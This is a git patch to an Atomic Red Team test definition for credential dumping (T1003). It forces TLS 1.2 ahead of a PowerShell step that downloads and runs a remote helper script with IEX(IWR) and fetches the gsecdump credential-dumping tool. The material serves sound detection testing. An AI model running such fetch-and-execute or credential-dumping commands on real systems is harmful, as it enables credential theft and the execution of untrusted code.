From f5665eafea16dfb4a066f86b7ea5c6e4d80c934a Mon Sep 17 00:00:00 2001
From: Scoubi <Scoubi@users.noreply.github.com>
Date: Tue, 14 Jul 2020 10:50:50 -0400
Subject: [PATCH] Update T1003.yaml (#1120)

Add a line to include/force TLS1.2 in order for the prereq function to work on win2k16
All the credit to clr2of8 for sending me the string

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>
---
 atomics/T1003/T1003.yaml | 1 +
 1 file changed, 1 insertion(+)

diff --git a/atomics/T1003/T1003.yaml b/atomics/T1003/T1003.yaml
index ee449d71..499554da 100644
--- a/atomics/T1003/T1003.yaml
+++ b/atomics/T1003/T1003.yaml
@@ -54,6 +54,7 @@ atomic_tests:
     prereq_command: |
       if (Test-Path #{gsecdump_exe}) {exit 0} else {exit 1}
     get_prereq_command: |
+      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
       $parentpath = Split-Path "#{gsecdump_exe}"; $binpath = "$parentpath\gsecdump-v2b5.exe"
       IEX(IWR "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-WebRequestVerifyHash.ps1")
       if(Invoke-WebRequestVerifyHash "#{gsecdump_url}" "$binpath" #{gsecdump_bin_hash}){